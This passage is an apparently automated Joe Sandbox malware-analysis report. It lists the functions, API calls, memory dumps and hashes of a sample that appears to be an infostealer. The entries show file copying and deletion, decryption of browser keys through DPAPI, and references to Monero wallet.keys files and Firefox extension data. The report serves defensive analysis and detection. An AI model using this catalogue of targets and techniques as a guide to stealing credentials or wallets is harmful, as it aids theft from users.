                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B7D481
                                • lstrlen.KERNEL32(00000000), ref: 00B7D698
                                • lstrlen.KERNEL32(00000000), ref: 00B7D6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00B7D72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: f5f37bf8b1ab715b8e9968b615aee46ee691b7a2a0f2ee5edf29a7e79e7aae6a
                                • Instruction ID: aed76d29ca97bf8de5583442d5a84dc328661cf0521c930b4ab51396a377a5fe
                                • Opcode Fuzzy Hash: f5f37bf8b1ab715b8e9968b615aee46ee691b7a2a0f2ee5edf29a7e79e7aae6a
                                • Instruction Fuzzy Hash: FD91D4719101049BEB04FBA4DD96DEE73B8AF14300F5045AAF517B61B1EF386A09CB72
                                Function 00B7D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B88B60: GetSystemTime.KERNEL32(00B90E1A,00939FD8,00B905AE,?,?,00B713F9,?,0000001A,00B90E1A,00000000,?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B88B86
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B7D801
                                • lstrlen.KERNEL32(00000000), ref: 00B7D99F
                                • lstrlen.KERNEL32(00000000), ref: 00B7D9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 00B7DA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 8dc9a0248460f140a3bbd6256ad8eafd531ef10bc44c9b3d9eb392f47d26d3a6
                                • Instruction ID: 7818204d0fda49726ac72d369a8dc37a7694415e596145baeaa9514e615060c6
                                • Opcode Fuzzy Hash: 8dc9a0248460f140a3bbd6256ad8eafd531ef10bc44c9b3d9eb392f47d26d3a6
                                • Instruction Fuzzy Hash: FA81E2729101149BEB04FBA4DC96DEE73B8AF54300F5045AAF517B61B1EF386A09CB72
                                Function 00B7F4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B799EC
                                  • Part of subcall function 00B799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B79A11
                                  • Part of subcall function 00B799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B79A31
                                  • Part of subcall function 00B799C0: ReadFile.KERNEL32(000000FF,?,00000000,00B7148F,00000000), ref: 00B79A5A
                                  • Part of subcall function 00B799C0: LocalFree.KERNEL32(00B7148F), ref: 00B79A90
                                  • Part of subcall function 00B799C0: CloseHandle.KERNEL32(000000FF), ref: 00B79A9A
                                  • Part of subcall function 00B88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B88E52
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00B91580,00B90D92), ref: 00B7F54C
                                • lstrlen.KERNEL32(00000000), ref: 00B7F56B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                • String ID: ^userContextId=4294967295$moz-extension+++
                                • API String ID: 998311485-3310892237
                                • Opcode ID: 6ec58bf5c58720e8623d908cf223eea324bcfa9c206a5250398b175f0d863024
                                • Instruction ID: 202129dcc782fac1c67c75a0d4ca706117c2c30fdf670a34c6f8f16a670037be
                                • Opcode Fuzzy Hash: 6ec58bf5c58720e8623d908cf223eea324bcfa9c206a5250398b175f0d863024
                                • Instruction Fuzzy Hash: 97510575D101099BEB04FBB4DC96DED73B8AF54300F4085A9F816671A1EF386A09CBB2
                                Function 00B83560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 2e3b8e23f779b4bd890fd0744fe2ba9a859700378e8f49be18b0f9ab2d40bbb8
                                • Instruction ID: 687550dcca487416acecabf3cb19c8c9fc079e27a61f082645ccd477834744fe
                                • Opcode Fuzzy Hash: 2e3b8e23f779b4bd890fd0744fe2ba9a859700378e8f49be18b0f9ab2d40bbb8
                                • Instruction Fuzzy Hash: 8F414F75D14109EFDF04FFA4D895AEEB7F4AF44B04F008059E41676260EB74AA05CFA2
                                Function 00B79CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B799EC
                                  • Part of subcall function 00B799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B79A11
                                  • Part of subcall function 00B799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B79A31
                                  • Part of subcall function 00B799C0: ReadFile.KERNEL32(000000FF,?,00000000,00B7148F,00000000), ref: 00B79A5A
                                  • Part of subcall function 00B799C0: LocalFree.KERNEL32(00B7148F), ref: 00B79A90
                                  • Part of subcall function 00B799C0: CloseHandle.KERNEL32(000000FF), ref: 00B79A9A
                                  • Part of subcall function 00B88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B88E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00B79D39
                                  • Part of subcall function 00B79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B74EEE,00000000,00000000), ref: 00B79AEF
                                  • Part of subcall function 00B79AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00B74EEE,00000000,?), ref: 00B79B01
                                  • Part of subcall function 00B79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B74EEE,00000000,00000000), ref: 00B79B2A
                                  • Part of subcall function 00B79AC0: LocalFree.KERNEL32(?,?,?,?,00B74EEE,00000000,?), ref: 00B79B3F
                                  • Part of subcall function 00B79B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B79B84
                                  • Part of subcall function 00B79B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00B79BA3
                                  • Part of subcall function 00B79B60: LocalFree.KERNEL32(?), ref: 00B79BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: a6bf8a703f9006f7c8d5913b5043d6a8f121c4dec776dbc80cbd77f5d175af91
                                • Instruction ID: 3003b12e9bbac1d94803305594205b70f95abead3d1490d52baef1f1f92abe34
                                • Opcode Fuzzy Hash: a6bf8a703f9006f7c8d5913b5043d6a8f121c4dec776dbc80cbd77f5d175af91
                                • Instruction Fuzzy Hash: B63110B5D10209ABDF14EBE4DC85AEE77F8EB48304F1485A9E915A7241FB349A04CBA1
                                Function 00B892E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(00B83AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00B83AEE,?), ref: 00B892FC
                                • GetFileSizeEx.KERNEL32(000000FF,00B83AEE), ref: 00B89319
                                • CloseHandle.KERNEL32(000000FF), ref: 00B89327
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleSize
                                • String ID:
                                • API String ID: 1378416451-0
                                • Opcode ID: cc45c03373a857e0d2d7bf6317802bfd79cc3f34a7363bc0e13e06ca3c8e4139
                                • Instruction ID: 9ad2784c6cae57559fbe66d1886603c0365f51ae19ba5f9c9131b516d291ba6e
                                • Opcode Fuzzy Hash: cc45c03373a857e0d2d7bf6317802bfd79cc3f34a7363bc0e13e06ca3c8e4139
                                • Instruction Fuzzy Hash: 05F01975E44308FBDF10EBA4DC49BAE77F9EB48710F108294B651A72D0DA709A018B94
                                Function 00B8C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 00B8C74E
                                  • Part of subcall function 00B8BF9F: __amsg_exit.LIBCMT ref: 00B8BFAF
                                • __getptd.LIBCMT ref: 00B8C765
                                • __amsg_exit.LIBCMT ref: 00B8C773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00B8C797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 8ba8b50736adf178db86c1913768c1451760d0d1474c8bfaabb996fd2058a2e4
                                • Instruction ID: 2f1978f3bab64150a0b2c81182b1fdc54114a1428a60503e8e406955dd6c2016
                                • Opcode Fuzzy Hash: 8ba8b50736adf178db86c1913768c1451760d0d1474c8bfaabb996fd2058a2e4
                                • Instruction Fuzzy Hash: 92F06D769042109BD721BBB89806F4D3BE0AF00720F2441CAF504A71F2DF745D40DF6A
                                Function 00B84F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00B88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B88E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00B84F7A
                                • lstrcat.KERNEL32(?,00B91070), ref: 00B84F97
                                • lstrcat.KERNEL32(?,00938A30), ref: 00B84FAB
                                • lstrcat.KERNEL32(?,00B91074), ref: 00B84FBD
                                  • Part of subcall function 00B84910: wsprintfA.USER32 ref: 00B8492C
                                  • Part of subcall function 00B84910: FindFirstFileA.KERNEL32(?,?), ref: 00B84943
                                  • Part of subcall function 00B84910: StrCmpCA.SHLWAPI(?,00B90FDC), ref: 00B84971
                                  • Part of subcall function 00B84910: StrCmpCA.SHLWAPI(?,00B90FE0), ref: 00B84987
                                  • Part of subcall function 00B84910: FindNextFileA.KERNEL32(000000FF,?), ref: 00B84B7D
                                  • Part of subcall function 00B84910: FindClose.KERNEL32(000000FF), ref: 00B84B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: 7fbcf892ddccc2f8abeb68e2792bd40af903779448d435b7779bf1679a51099a
                                • Instruction ID: 831a2e23dfab3ca5066a480e857b411f73fcb5dcdb8a62a601385d1b3fe984f4
                                • Opcode Fuzzy Hash: 7fbcf892ddccc2f8abeb68e2792bd40af903779448d435b7779bf1679a51099a
                                • Instruction Fuzzy Hash: E7218876900304EBCB54FB64DC46EED33BCA754700F4046D4B659925A1EE7597C8CBB2